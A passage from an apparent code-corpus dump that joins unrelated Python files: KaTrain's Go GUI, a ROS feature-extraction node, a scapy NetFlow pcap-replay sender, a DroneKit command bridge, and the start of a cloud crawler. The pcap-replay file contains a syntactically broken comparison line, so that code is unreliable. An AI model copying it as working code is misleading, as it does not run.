mode = self.play_analyze_mode
if (move_tree is not None and mode == MODE_PLAY) or (move_tree is None and mode == MODE_ANALYZE):
self.play_mode.switch_ui_mode() # for new game, go to play, for loaded, analyze
self.board_gui.animating_pv = None
self.engine.on_new_game() # clear queries
self.game = Game(self, self.engine, move_tree=move_tree, analyze_fast=analyze_fast)
if move_tree:
for bw, player_info in self.players_info.items():
player_info.player_type = PLAYER_HUMAN
player_info.player_subtype = PLAYING_NORMAL
player_info.sgf_rank = move_tree.root.get_property(bw + "R")
player_info.calculated_rank = None
player_info.name = move_tree.root.get_property("P" + bw)
self.update_player(bw)
self.controls.graph.initialize_from_game(self.game.root)
# self.controls.rank_graph.initialize_from_game(self.game.root)
self.update_state(redraw_board=True)
def _do_ai_move(self, node=None):
if node is None or self.game.current_node == node:
mode = self.next_player_info.strategy
settings = self.config(f"ai/{mode}")
if settings is not None:
generate_ai_move(self.game, mode, settings)
else:
self.log(f"AI Mode {mode} not found!", OUTPUT_ERROR)
def _do_undo(self, n_times=1):
if n_times == "smart":
n_times = 1
if self.play_analyze_mode == MODE_PLAY and self.last_player_info.ai and self.next_player_info.human:
n_times = 2
self.board_gui.animating_pv = None
self.game.undo(n_times)
def _do_resign(self):
self.game.current_node.end_state = f"{self.game.current_node.player}+R"
def _do_redo(self, n_times=1):
self.board_gui.animating_pv = None
self.game.redo(n_times)
def _do_next_mistake(self):
self.board_gui.animating_pv = None
self.game.redo(999, stop_on_mistake=self.config("trainer/eval_thresholds")[-4])
def _do_cycle_children(self, *args):
self.board_gui.animating_pv = None
self.game.cycle_children(*args)
def _do_switch_branch(self, *args):
self.board_gui.animating_pv = None
self.controls.move_tree.switch_branch(*args)
def _do_play(self, coords):
self.board_gui.animating_pv = None
try:
self.game.play(Move(coords, player=self.next_player_info.player))
except IllegalMoveException as e:
self.controls.set_status(f"Illegal Move: {str(e)}", STATUS_ERROR)
def _do_analyze_extra(self, mode, **kwargs):
self.game.analyze_extra(mode, **kwargs)
def _do_new_game_popup(self):
self.controls.timer.paused = True
if not self.new_game_popup:
self.new_game_popup = I18NPopup(
title_key="New Game title", size=[dp(800), dp(800)], content=NewGamePopup(self)
).__self__
self.new_game_popup.content.popup = self.new_game_popup
self.new_game_popup.open()
def _do_timer_popup(self):
self.controls.timer.paused = True
if not self.timer_settings_popup:
self.timer_settings_popup = I18NPopup(
title_key="timer settings", size=[dp(600), dp(500)], content=ConfigTimerPopup(self)
).__self__
self.timer_settings_popup.content.popup = self.timer_settings_popup
self.timer_settings_popup.open()
def _do_teacher_popup(self):
self.controls.timer.paused = True
if not self.teacher_settings_popup:
self.teacher_settings_popup = I18NPopup(
title_key="teacher settings", size=[dp(800), dp(750)], content=ConfigTeacherPopup(self)
).__self__
self.teacher_settings_popup.content.popup = self.teacher_settings_popup
self.teacher_settings_popup.open()
def _do_config_popup(self):
self.controls.timer.paused = True
if not self.config_popup:
self.config_popup = I18NPopup(
title_key="general settings title", size=[dp(1200), dp(950)], content=ConfigPopup(self)
).__self__
self.config_popup.content.popup = self.config_popup
self.config_popup.open()
def _do_ai_popup(self):
self.controls.timer.paused = True
if not self.ai_settings_popup:
self.ai_settings_popup = I18NPopup(
title_key="ai settings", size=[dp(750), dp(750)], content=ConfigAIPopup(self)
).__self__
self.ai_settings_popup.content.popup = self.ai_settings_popup
self.ai_settings_popup.open()
def load_sgf_file(self, file, fast=False, rewind=True):
try:
move_tree = KaTrainSGF.parse_file(file)
except ParseError as e:
self.log(i18n._("Failed to load SGF").format(error=e), OUTPUT_ERROR)
return
self._do_new_game(move_tree=move_tree, analyze_fast=fast)
if not rewind:
self.game.redo(999)
def _do_analyze_sgf_popup(self):
if not self.fileselect_popup:
popup_contents = LoadSGFPopup()
popup_contents.filesel.path = os.path.abspath(os.path.expanduser(self.config("general/sgf_load", ".")))
self.fileselect_popup = I18NPopup(
title_key="load sgf title", size=[dp(1200), dp(800)], content=popup_contents
).__self__
def readfile(*_args):
filename = popup_contents.filesel.filename
self.fileselect_popup.dismiss()
path, file = os.path.split(filename)
settings_path = self.config("general/sgf_load")
if path != settings_path:
self.log(f"Updating sgf load path default to {path}", OUTPUT_INFO)
self._config["general"]["sgf_load"] = path
self.save_config("general")
self.load_sgf_file(filename, popup_contents.fast.active, popup_contents.rewind.active)
popup_contents.filesel.on_success = readfile
popup_contents.filesel.on_submit = readfile
self.fileselect_popup.open()
self.fileselect_popup.content.filesel.ids.list_view._trigger_update()
def _do_output_sgf(self):
msg = self.game.write_sgf(self.config("general/sgf_save"))
self.log(msg, OUTPUT_INFO)
self.controls.set_status(msg, STATUS_INFO)
def load_sgf_from_clipboard(self):
clipboard = Clipboard.paste()
if not clipboard:
self.controls.set_status(f"Ctrl-V pressed but clipboard is empty.", STATUS_INFO)
return
url_match = re.match(r"(?P<url>https?://[^\s]+)", clipboard)
if url_match:
self.log("Recognized url: " + url_match.group(), OUTPUT_INFO)
http = urllib3.PoolManager()
response = http.request("GET", url_match.group())
clipboard = response.data.decode("utf-8")
try:
move_tree = KaTrainSGF.parse_sgf(clipboard)
except Exception as exc:
self.controls.set_status(
i18n._("Failed to import from clipboard").format(error=exc, contents=clipboard[:50]), STATUS_INFO
)
return
move_tree.nodes_in_tree[-1].analyze(
self.engine, analyze_fast=False
) # speed up result for looking at end of game
self._do_new_game(move_tree=move_tree, analyze_fast=True)
self("redo", 999)
self.log("Imported game from clipboard.", OUTPUT_INFO)
def on_touch_up(self, touch):
if (
self.board_gui.collide_point(*touch.pos)
or self.board_controls.collide_point(*touch.pos)
or self.controls.move_tree.collide_point(*touch.pos)
):
if touch.is_mouse_scrolling:
if touch.button == "scrollup":
self("redo")
elif touch.button == "scrolldown":
self("undo")
return super().on_touch_up(touch)
@property
def shortcuts(self):
return {
"q": self.analysis_controls.show_children,
"w": self.analysis_controls.eval,
"e": self.analysis_controls.hints,
"t": self.analysis_controls.ownership,
"r": self.analysis_controls.policy,
"enter": ("ai-move",),
"numpadenter": ("ai-move",),
"a": ("analyze-extra", "extra"),
"s": ("analyze-extra", "equalize"),
"d": ("analyze-extra", "sweep"),
"f": ("analyze-extra", "alternative"),
"g": ("analyze-extra", "local"),
"p": ("play", None),
"n": ("next-mistake",),
"down": ("switch-branch", 1),
"up": ("switch-branch", -1),
"f5": ("timer-popup",),
"f6": ("teacher-popup",),
"f7": ("ai-popup",),
"f8": ("config-popup",),
}
@property
def popup_open(self) -> Popup:
app = App.get_running_app()
first_child = app.root_window.children[0]
return first_child if isinstance(first_child, Popup) else None
def _on_keyboard_down(self, _keyboard, keycode, _text, modifiers):
if self.controls.note.focus:
return # when making notes, don't allow keyboard shortcuts
popup = self.popup_open
if popup:
if keycode[1] in ["f5", "f6", "f7", "f8"]: # switch between popups
popup.dismiss()
return
else:
return
ctrl_pressed = "ctrl" in modifiers
alt_pressed = "alt" in modifiers
shift_pressed = "shift" in modifiers
shortcuts = self.shortcuts
if keycode[1] == "tab":
self.play_mode.switch_ui_mode()
elif keycode[1] == "shift":
self.nav_drawer.set_state("toggle")
elif keycode[1] == "spacebar":
self.toggle_continuous_analysis()
elif keycode[1] == "b" and ctrl_pressed:
self.controls.timer.paused = not self.controls.timer.paused
elif keycode[1] in ["`", "~", "m"] and ctrl_pressed:
self.zen = (self.zen + 1) % 3
elif keycode[1] in ["left", "z"]:
self("undo", 1 + (alt_pressed or shift_pressed) * 9 + (ctrl_pressed and not alt_pressed) * 999)
elif keycode[1] in ["right", "x"]:
self("redo", 1 + (alt_pressed or shift_pressed) * 9 + (ctrl_pressed and not alt_pressed) * 999)
elif keycode[1] == "home":
self("undo", 999)
elif keycode[1] == "end":
self("redo", 999)
elif keycode[1] == "n" and ctrl_pressed:
self("new-game-popup")
elif keycode[1] == "l" and ctrl_pressed:
self("analyze-sgf-popup")
elif keycode[1] == "s" and ctrl_pressed:
self("output-sgf")
elif keycode[1] == "c" and ctrl_pressed:
Clipboard.copy(self.game.root.sgf())
self.controls.set_status(i18n._("Copied SGF to clipboard."), STATUS_INFO)
elif keycode[1] == "v" and ctrl_pressed:
self.load_sgf_from_clipboard()
elif keycode[1] in shortcuts.keys() and not ctrl_pressed:
shortcut = shortcuts[keycode[1]]
if isinstance(shortcut, Widget):
shortcut.trigger_action(duration=0)
else:
self(*shortcut)
return True
class KaTrainApp(MDApp):
gui = ObjectProperty(None)
language = StringProperty(DEFAULT_LANGUAGE)
def __init__(self):
super().__init__()
def build(self):
self.icon = ICON # how you're supposed to set an icon
self.title = f"KaTrain v{VERSION}"
self.theme_cls.theme_style = "Dark"
self.theme_cls.primary_palette = "Gray"
self.theme_cls.primary_hue = "200"
kv_file = find_package_resource("katrain/gui.kv")
popup_kv_file = find_package_resource("katrain/popups.kv")
resource_add_path(PATHS["PACKAGE"])
Builder.load_file(kv_file)
Window.bind(on_request_close=self.on_request_close)
Window.bind(on_dropfile=lambda win, file: self.gui.load_sgf_file(file.decode("utf8")))
self.gui = KaTrainGui()
Builder.load_file(popup_kv_file)
return self.gui
def on_language(self, _instance, language):
self.gui.log(f"Switching language to {language}", OUTPUT_INFO)
i18n.switch_lang(language)
self.gui._config["general"]["lang"] = language
self.gui.save_config()
if self.gui.game:
self.gui.update_state()
self.gui.controls.set_status("", STATUS_INFO)
def webbrowser(self, site_key):
websites = {"homepage": HOMEPAGE + "#manual", "support": HOMEPAGE + "#support"}
if site_key in websites:
webbrowser.open(websites[site_key])
def on_start(self):
self.language = self.gui.config("general/lang")
self.gui.start()
def on_request_close(self, *_args):
if getattr(self, "gui", None):
self.gui.play_mode.save_ui_state()
if self.gui.engine:
self.gui.engine.shutdown()
def signal_handler(self, _signal, _frame):
if self.gui.debug_level >= OUTPUT_DEBUG:
print("TRACEBACKS")
for threadId, stack in sys._current_frames().items():
print(f"\n# ThreadID: {threadId}")
for filename, lineno, name, line in traceback.extract_stack(stack):
print(f"\tFile: {filename}, line {lineno}, in {name}")
if line:
print(f"\t\t{line.strip()}")
self.stop()
def run_app():
class CrashHandler(ExceptionHandler):
def handle_exception(self, inst):
ex_type, ex, tb = sys.exc_info()
trace = "".join(traceback.format_tb(tb))
app = MDApp.get_running_app()
if app and app.gui:
app.gui.log(
f"Exception {inst.__class__.__name__}: {', '.join(repr(a) for a in inst.args)}\n{trace}",
OUTPUT_ERROR,
)
else:
print(f"Exception {inst.__class__}: {inst.args}\n{trace}")
return ExceptionManager.PASS
ExceptionManager.add_handler(CrashHandler())
app = KaTrainApp()
signal.signal(signal.SIGINT, app.signal_handler)
app.run()
if __name__ == "__main__":
run_app()
|
feature_extraction_node.py
|
#!/usr/bin/env python3
# Copyright (C) <2020-2021> Intel Corporation
# SPDX-License-Identifier: MIT
import os
import cv2
import numpy as np
import time
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge
from image_feature_msgs.msg import ImageFeatures, KeyPoint
from std_msgs.msg import MultiArrayDimension
import threading
import queue
def main():
rospy.init_node('feature_extraction_node')
#========================================= ROS params =========================================
# Available nets: hfnet_vino, hfnet_tf
net_name = rospy.get_param('~net', 'hfnet_tf')
# User can set more than one input image topics, e.g. /cam1/image,/cam2/image
topics = rospy.get_param('~topics', '/d400/color/image_raw')
# Set gui:=True to pop up a window for each topic showing detected keypoints,
# which will also be published to corresponding keypoints topics (e.g. /cam1/keypoints)
gui = rospy.get_param('~gui', False)
# For every log_interval seconds we will print performance stats for each topic
log_interval = rospy.get_param('~log_interval', 3.0)
#==============================================================================================
if net_name == 'hfnet_vino':
from hfnet_vino import FeatureNet, default_config
elif net_name == 'hfnet_tf':
from hfnet_tf import FeatureNet, default_config
else:
exit('Unknown net %s' % net_name)
config = default_config
#====================================== More ROS params =======================================
# Model path and hyperparameters are provided by the specifed net by default, but can be changed
# e.g., one can tell the desired (maximal) numbers of keypoints by setting keypoint_number,
# or filtering out low-quality keypoints by setting a high value of keypoint_threshold
for item in config.keys():
config[item] = rospy.get_param('~' + item, config[item])
#==============================================================================================
net = FeatureNet()
node = Node(net, gui, log_interval)
for topic in topics.split(','):
node.subscribe(topic)
rospy.spin()
class Node():
def __init__(self, net, gui, log_interval):
self.net = net
self.gui = gui
self.log_interval = log_interval
self.cv_bridge = CvBridge()
self.feature_publishers = {}
self.keypoint_publishers = {}
self.subscribers = {}
self.latest_msgs = {}
self.latest_msgs_lock = threading.Lock()
self.stats = {}
self.stats_lock = threading.Lock()
self.result_queue = queue.Queue()
self.worker_thread = threading.Thread(target=self.worker)
self.worker_thread.start()
self.publisher_thread = threading.Thread(target=self.publisher)
self.publisher_thread.start()
def subscribe(self, topic):
base_topic = '/'.join(topic.split('/')[:-1])
self.feature_publishers[topic] = rospy.Publisher(base_topic + '/features', ImageFeatures, queue_size=1)
self.keypoint_publishers[topic] = rospy.Publisher(base_topic + '/keypoints', Image, queue_size=1)
self.stats[topic] = {'received': 0, 'processed': 0, 'last_time': None}
with self.latest_msgs_lock:
self.latest_msgs[topic] = None
callback = lambda msg: self.callback(msg, topic)
self.subscribers[topic] = rospy.Subscriber(topic, Image, callback, queue_size=1, buff_size=2**24)
def callback(self, msg, topic):
# keep only the lastest message
with self.latest_msgs_lock:
self.latest_msgs[topic] = msg
with self.stats_lock:
self.stats[topic]['received'] += 1
def worker(self):
while not rospy.is_shutdown():
no_new_msg = True
# take turn to process each topic
for topic in self.latest_msgs.keys():
with self.latest_msgs_lock:
msg = self.latest_msgs[topic]
self.latest_msgs[topic] = None
if msg is not None:
self.process(msg, topic)
with self.stats_lock:
self.stats[topic]['processed'] += 1
no_new_msg = False
self.print_stats(topic)
if no_new_msg: time.sleep(0.01)
def publisher(self):
while not rospy.is_shutdown():
if self.result_queue.qsize() > 5:
rospy.logwarn_throttle(1, 'WOW! Inference is faster than publishing' +
' (%d unpublished result in the queue)\n' % self.result_queue.qsize() +
'Please add more publisher threads!')
try:
res = self.result_queue.get(timeout=.5)
except queue.Empty:
continue
features = res['features']
topic = res['topic']
image = res['image']
header = res['header']
self.result_queue.task_done()
feature_msg = features_to_ros_msg(features, header)
self.feature_publishers[topic].publish(feature_msg)
# drawing keypoints is the most expensive operation in the publisher thread, and
# can be slow when the system workload is high. So we skip drawing the keypoints
# if there are many queued results to be published.
if self.result_queue.qsize() > 2: continue
if self.keypoint_publishers[topic].get_num_connections() > 0 or self.gui:
draw_keypoints(image, features['keypoints'], features['scores'])
if self.keypoint_publishers[topic].get_num_connections() > 0:
keypoint_msg = self.cv_bridge.cv2_to_imgmsg(image, encoding='passthrough')
keypoint_msg.header = header
self.keypoint_publishers[topic].publish(keypoint_msg)
if self.gui:
cv2.imshow(topic, image)
cv2.waitKey(1)
def print_stats(self, topic):
now = rospy.Time.now()
if self.stats[topic]['last_time'] is None:
self.stats[topic]['last_time'] = now
elapsed = (now - self.stats[topic]['last_time']).to_sec()
if elapsed > self.log_interval:
with self.stats_lock:
received = self.stats[topic]['received']
processed = self.stats[topic]['processed']
self.stats[topic]['received'] = 0
self.stats[topic]['processed'] = 0
self.stats[topic]['last_time'] = now
if received > 0:
rospy.loginfo(topic + ': processed %d out of %d in past %.1f sec (%.2f FPS)' % (processed, received, elapsed, processed / elapsed))
else:
rospy.loginfo(topic + ': no message received')
def process(self, msg, topic):
if msg.encoding == '8UC1' or msg.encoding == 'mono8':
image = self.cv_bridge.imgmsg_to_cv2(msg)
image_gray = image
else:
image = self.cv_bridge.imgmsg_to_cv2(msg, 'bgr8')
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
start = time.time()
features = self.net.infer(image_gray)
stop = time.time()
rospy.logdebug(topic + ': %.2f (%d keypoints)' % (
(stop - start) * 1000,
features['keypoints'].shape[0]))
if (features['keypoints'].shape[0] != 0):
res = {'features': features, 'header': msg.header, 'topic': topic, 'image': image}
self.result_queue.put(res)
def draw_keypoints(image, keypoints, scores):
upper_score = 0.5
lower_score = 0.1
scale = 1 / (upper_score - lower_score)
for p,s in zip(keypoints, scores):
s = min(max(s - lower_score, 0) * scale, 1)
color = (255 * (1 - s), 255 * (1 - s), 255) # BGR
cv2.circle(image, tuple(p), 3, color, 2)
def features_to_ros_msg(features, header):
msg = ImageFeatures()
msg.header = header
msg.sorted_by_score.data = False
for kp in features['keypoints']:
p = KeyPoint()
p.x = kp[0]
p.y = kp[1]
msg.keypoints.append(p)
msg.scores = features['scores'].flatten()
msg.descriptors.data = features['local_descriptors'].flatten()
shape = features['local_descriptors'][0].shape
msg.descriptors.layout.dim.append(MultiArrayDimension())
msg.descriptors.layout.dim[0].label = 'keypoint'
msg.descriptors.layout.dim[0].size = shape[0]
msg.descriptors.layout.dim[0].stride = shape[0] * shape[1]
msg.descriptors.layout.dim.append(MultiArrayDimension())
msg.descriptors.layout.dim[1].label = 'descriptor'
msg.descriptors.layout.dim[1].size = shape[1]
msg.descriptors.layout.dim[1].stride = shape[1]
msg.global_descriptor = features['global_descriptor'][0]
return msg
if __name__ == "__main__":
main()
|
main.py
|
# -*- coding: utf-8 -*-
import os
import time
import socket
import logging
import threading
import yaml
from scapy.all import *
from pathlib import Path
from scapy.layers.inet import ICMP
from scapy.layers.l2 import *
from scapy.layers.inet6 import IP, UDP
socket.setdefaulttimeout(20)
BUF_SIZE = 1024
SERVER_NUM = 1
def get_logger():
""" 打印的日志文件在本项目目录的/Logs下 """
logger = logging.getLogger()
logging.basicConfig(level=logging.INFO)
rq = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))
log_path = os.path.dirname(os.getcwd() + '/Logs/')
if not Path(log_path).is_dir():
os.makedirs(log_path)
log_name = os.path.join(log_path, rq + '.log')
fh = logging.FileHandler(log_name, mode='w')
# fh = logging.FileHandler('./Logs/test.log', mode='w')
fh.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s: %(message)s")
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
class UDPServer:
ipaddr = '10.0.102.79'
port = 9996
family = socket.AF_INET
protocol = socket.SOCK_DGRAM
logger = None
def __init__(self):
""" 只是一个给予python socket库写的发包,
在本次项目中没有用处,但可以做测试
:param logger: 避免全局搜索logger带来的混乱,这里直接传入logger
"""
self.local_ip_address = self.get_local_ip_address()
def get_local_ip_address(self):
""" 获取本地ip地址 """
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
s.close()
return ip
def send(self, data):
""" 发包
:param data: 列表,一次多段发包
:return: 无
"""
import random
self.client = socket.socket(self.family, self.protocol)
self.client.connect((self.ipaddr, self.port))
for d in data:
self.client.sendall(d)
# data_recv = self.client.recvfrom(BUF_SIZE) # 只是发包,没法阻塞
secs = random.random()
time.sleep(secs)
self.client.close()
class PcapFileExtractor(object):
datagram = []
remote_mac_address = ''
remote_ip_address = '10.0.107.61'
remote_ipv6 = ''
remote_cflow_port = 9996
remote_sflow_port = 6343
pyshark_data = []
def __init__(self, file_path, config):
self.file_path = file_path
self.local_mac_address = self.get_local_mac_address()
self.local_ip_address = self.get_local_ip_address()
self.local_ipv6 = self.get_local_ipv6()
self.__dict__.update(**config)
# for k, v in self.__dict__.items():
# self.logger.info(f"{k}={v}")
def scapy_extractor(self):
""" 使用scapy获取pcap文件中所有的包,并重新生成数据包,放入列表中返回
:return: 含有整理后的数据包的列表
"""
packets = rdpcap(self.file_path)
ps = []
for packet in packets:
# 确认该包是cflow或者sflow
if packet.getlayer('Netflow Header'):
version = packet.getlayer('Netflow Header').fields['version']
# 确认版本号v5或者v9
if version in [5, 9]:
layer = packet.getlayer('Netflow Header')
layer.__delattr__('sysUptime')
layer.__delattr__('unixSecs')
# udp包
# pkt = Ether(dst=self.remote_mac_address) / IP(
# dst=self.remote_ip_address) / UDP(dport=self.remote_port)
# icmp包
# pkt = IP(self.remote_ip_address) / ICMP()
# netflow的包
pkt = IP(dst=self.remote_ip_address) / UDP(dport=self.remote_cflow_port) / packet.getlayer('Netflow Header')
ps.append(pkt)
if packet.getlayer('IP').fields['version'] == and packet.getlayer('Netflow Header').fields['version'] == 0:
pkt = packet.copy()
pkt.getlayer('IP').fields['src'] = self.local_ip_address
pkt.getlayer('IP').fields['dst'] = self.remote_ip_address
pkt.getlayer('Ether').fields['dst'] = self.remote_mac_address
ps.append(pkt)
return ps
def pyshark_extractor(self):
""" 使用pyshark获取包,但因为难以重新整理,该功能废除,仅能作为读取分析使用
:return: pyshark读取的sflow与cflow数据包的列表
"""
import pyshark
packets = pyshark.FileCapture(self.file_path)
idx = 0
for packet in packets:
if 'sflow' in dir(packet):
idx = self._make_data('sflow', packet, idx)
if 'cflow' in dir(packet):
idx = self._make_data('cflow', packet, idx)
packets.close()
return self.pyshark_data
def _make_data(self, name, packet, idx):
""" 配合pyshark获取包,挖掘udp中的payload """
if 'data' in dir(packet.layers[-1]):
idx += 1
self.pyshark_data.append([layer.binary_value
for layer in packet.layers[-1].pyshark_data.all_fields])
# self.data.append(b''.join([layer.binary_value
# for layer in packet.layers[-1].data.all_fields]))
time.sleep(0.5)
return idx
def get_local_mac_address(self):
""" 获取本地mac地址 """
import uuid
mac = uuid.UUID(int=uuid.getnode()).hex[-12:]
return ":".join([mac[e:e + 2] for e in range(0, 11, 2)])
def get_local_ip_address(self):
""" 获取本地IP地址 """
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
s.close()
return ip
def get_local_ipv6(self):
""" 获取本地ipv6的地址,但是会出错,尽可能人工写入 """
import socket
ipv6 = ''
groups = socket.getaddrinfo(socket.gethostname(), None)
for group in groups:
if group[0].name == 'AF_INET6':
ipv6 = group[4][0]
break
return ipv6
def get_handler_config():
filepath = os.path.dirname(__file__)
path = os.path.join(filepath, 'config.yaml')
with open(path, 'r', encoding='utf-8') as f:
conf = yaml.load(f.read(), Loader=yaml.FullLoader)
return conf
def scapy_send_package(number, worker, pkts):
""" 为多线程创建的发包函数 """
idx = 1
while True:
for j in range(len(pkts)):
send(pkts[j])
idx += 1
if __name__ == '__main__':
# logger = get_logger()
# logger.info('PCAP Replay starts!')
try:
# 获取参数与获取数据包
config = get_handler_config()
remote_info = config.get('remote_info')
if remote_info:
port = remote_info.get('remote_port')
if port:
remote_info['remote_port'] = int(port)
extractor = PcapFileExtractor(config.get('server').get('pcap_file'), remote_info)
pkts = extractor.scapy_extractor()
# # 获取线程数与服务器编号
workers = config.get('server').get('workers')
number = config.get('server').get('number')
# 多线程发送
threads = []
for i in range(workers):
t = threading.Thread(target=scapy_send_package, args=(number, i+1, pkts))
threads.append(t)
for i in range(workers):
threads[i].start()
for i in range(workers):
threads[i].join()
except Exception as e:
print(e.__repr__())
print("Failed to activate threads.")
# logger.info('Failed to activate threads.')
# 使用socket发送udp包
# udp = UDPServer(logger)
# while True:
# udp.send([b'hello'])
# for value in data:
# udp.send(value)
|
droneAPI.py
|
#!/usr/bin/env python
import math
import json
import Queue
import threading
FRAME_LOCAL_NED = 1
MAV_CMD_CONDITION_YAW = 115
MAV_CMD_DO_SET_ROI = 201
downloaded = False
q = Queue.Queue()
def print_json():
while True:
msg = q.get()
print(json.dumps(msg))
t = threading.Thread(target=print_json,args=())
t.daemon = True
t.start()
def attribute_callback(self,attr_name,value):
if value != None:
if attr_name == 'location.global_frame':
q.put({ 'gpsCoords':{ 'lat':value.lat, 'long':value.lon, 'alt':value.alt }})
elif attr_name == 'attitude':
q.put({ 'attitude':{ 'value':{'pitch':value.pitch, 'yaw':value.yaw, 'roll':value.roll }}})
elif attr_name == 'mode': q.put({ 'modeName':value.name })
elif attr_name == 'armed': q.put({ 'isArmed':value })
def send_ned_velocity(vehicle,vn,ve,vd):
msg = vehicle.message_factory.set_position_target_local_ned_encode(0,0,0,FRAME_LOCAL_NED,0b0000111111000111,0,0,0,vn,ve,vd,0,0,0,0,0)
vehicle.send_mavlink(msg)
def condition_yaw(vehicle,heading):
msg = vehicle.message_factory.command_long_encode(0,0,MAV_CMD_CONDITION_YAW,0,heading,0,1,0,0,0,0)
vehicle.send_mavlink(msg)
def set_roi(vehicle,latitude,longitude,altitude):
msg = vehicle.message_factory.command_long_encode(0,0,MAV_CMD_DO_SET_ROI,0,0,0,0,0,latitude,longitude,altitude)
vehicle.send_mavlink(msg)
def process_command(command,vehicle):
global downloaded
x = command.split();
if x[0] == "arm": vehicle.armed = True
# elif x[0] == "getAttitude":
# if vehicle.attitude == None: q.put({ 'attitude':{ 'value':None }})
# else: q.put({ 'attitude':{ 'value':{ 'pitch':vehicle.attitude.pitch, 'yaw':vehicle.attitude.yaw, 'roll':vehicle.attitude.roll }}})
elif x[0] == "getGimbal":
if vehicle.gimbal == None: q.put({ 'gimbal':{ 'value':None }})
else: q.put({ 'gimbal':{ 'value':vehicle.gimbal.pitch }})
elif x[0] == "getHomeLocation":
if not downloaded:
cmds = vehicle.commands
cmds.download()
cmds.wait_ready()
downloaded = True
if vehicle.home_location == None: q.put({ 'homeLocation':{ 'value':None }})
else: q.put({ 'homeLocation':{ 'value':{ 'lat':vehicle.home_location.lat, 'long':vehicle.home_location.lon, 'alt':vehicle.home_location.alt }}})
elif x[0] == "getVelocity":
if vehicle.velocity == None: q.put({ 'velocity':{ 'value':None }})
else: q.put({ 'velocity':{ 'value':vehicle.velocity }})
elif x[0] == "goto":
coord_lat = float(x[1])
coord_long = float(x[2])
coord_alt = float(x[3])
speed = float(x[4])
cmd_str = "goto " + str(coord_lat) + " " + str(coord_long) + " " + str(coord_alt) + " " + str(speed)
q.put({ 'cmd':cmd_str })
a_location = dronekit.LocationGlobal(coord_lat,coord_long,coord_alt)
vehicle.simple_goto(a_location,groundspeed=speed)
elif x[0] == "guided":
vehicle.mode = dronekit.VehicleMode("GUIDED")
q.put({ 'cmd':'guided' })
elif x[0] == "launch":
q.put({ 'cmd':'takeoff' })
vehicle.simple_takeoff(10)
elif x[0] == "loiter":
vehicle.mode = dronekit.VehicleMode("LOITER")
q.put({ 'cmd':'loiter' })
elif x[0] == "mode":
q.put({ 'modeName':vehicle.mode.name })
elif x[0] == "rotateGimbal":
pitch = float(x[1])
yaw = vehicle.attitude.yaw
cmd_str = "gimbal (" + str(pitch) + "," + str(yaw) + ")"
if yaw is not None and not math.isnan(yaw) and not math.isnan(pitch): vehicle.gimbal.rotate(pitch,0,yaw)
q.put({ 'cmd':cmd_str })
elif x[0] == "rtl":
vehicle.mode = dronekit.VehicleMode("RTL")
q.put({ 'cmd':'rtl' })
elif x[0] == "setROI":
latitude = float(x[1])
longitude = float(x[2])
altitude = float(x[3])
cmd_str = "roi " + str(latitude) + " " + str(longitude) + " " + str(altitude)
q.put({ 'cmd':cmd_str })
if not math.isnan(latitude) and not math.isnan(longitude) and not math.isnan(altitude): set_roi(vehicle,latitude,longitude,altitude)
elif x[0] == "setVelocity":
vn = float(x[1])
ve = float(x[2])
vd = float(x[3])
cmd_str = "velocity " + str(vn) + " " + str(ve) + " " + str(vd)
q.put({ 'cmd':cmd_str })
if not math.isnan(vn) and not math.isnan(ve) and not math.isnan(vd): send_ned_velocity(vehicle,vn,ve,vd)
elif x[0] == "setYaw":
heading = float(x[1])
cmd_str = "yaw " + str(heading)
q.put({ 'cmd':cmd_str })
if not math.isnan(heading): condition_yaw(vehicle,heading)
elif x[0] == "stabilize":
vehicle.mode = dronekit.VehicleMode("STABILIZE")
q.put({ 'cmd':'stabilize' })
# Connect to UDP endpoint (and wait for default attributes to accumulate)
def main():
target = "udpin:0.0.0.0:14550"
vehicle = dronekit.connect(target)
q.put({ 'isConnected':True })
vehicle.add_attribute_listener('location.global_frame',attribute_callback)
vehicle.add_attribute_listener('mode',attribute_callback)
vehicle.add_attribute_listener('armed',attribute_callback)
vehicle.add_attribute_listener('attitude',attribute_callback)
while 1:
line = ""
for c in raw_input():
line = line + c
process_command(line,vehicle)
vehicle.close()
try:
import dronekit
import sys
main()
except ImportError:
q.put({ 'isConnected':False })
|
main.py
|
# Standard
import hashlib
import os
import sys
import importlib
import json
import threading
import time
from urllib import parse
import io
import zipfile
from datetime import datetime
# Additional
import flask
import urllib3
import certifi
from google.cloud import firestore
from google.cloud import storage as firestorage
# global variable
access_counter = 0
# application
with open(os.path.join(os.path.dirname(__file__), "config.json"), "r", encoding="utf-8") as fp:
try: # on CaaS
wsgi_h = importlib.import_module("wsgi_h")
db = wsgi_h.db
DELETE_FIELD = wsgi_h.DELETE_FIELD
storage = wsgi_h.GCS.get_bucket(json.load(fp)["GCS_bucket"])
except: # on FaaS
db = firestore.Client()
DELETE_FIELD = firestore.DELETE_FIELD
storage = firestorage.Client().get_bucket(json.load(fp)["GCS_bucket"])
def deamon():
start_timestamp: int = int(datetime.now().timestamp()*1000)
# DB layer
docRefs = db.collection('nicoapi').list_documents()
for docRef in docRefs:
recodes: dict = docRef.get().to_dict()
# Document layer
# No recode, No Document
if len(recodes) < 1:
docRef.delete()
continue
for tsuid, order in recodes.items():
# 7days to delete
if int(datetime.now().timestamp()*1000) > int(tsuid.split("_")[0])+604800000:
recodes[tsuid] = DELETE_FIELD
if storage.blob("nicoapi/"+docRef.id + "/"+tsuid + ".zip").exists() == True:
storage.blob("nicoapi/"+docRef.id + "/" +
tsuid + ".zip").delete()
continue
# downloaded data is not exist on GCS → delete
if recodes[tsuid]["status"] == "processed":
if storage.blob("nicoapi/"+docRef.id + "/"+tsuid + ".zip").exists() == False:
recodes[tsuid] = DELETE_FIELD
continue
with io.BytesIO() as inmemory_zip:
# set https UserAgent
https = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where(
), headers={"User-Agent": order["User-Agent"]})
# start Crawl
for url in order["request_urls"]:
print(hashlib.md5(url.encode('utf-8')).hexdigest())
time.sleep(3)
try:
resp_json = https.request('GET', parse.quote(
url, safe="=&-?:/%")).data.decode('utf-8')
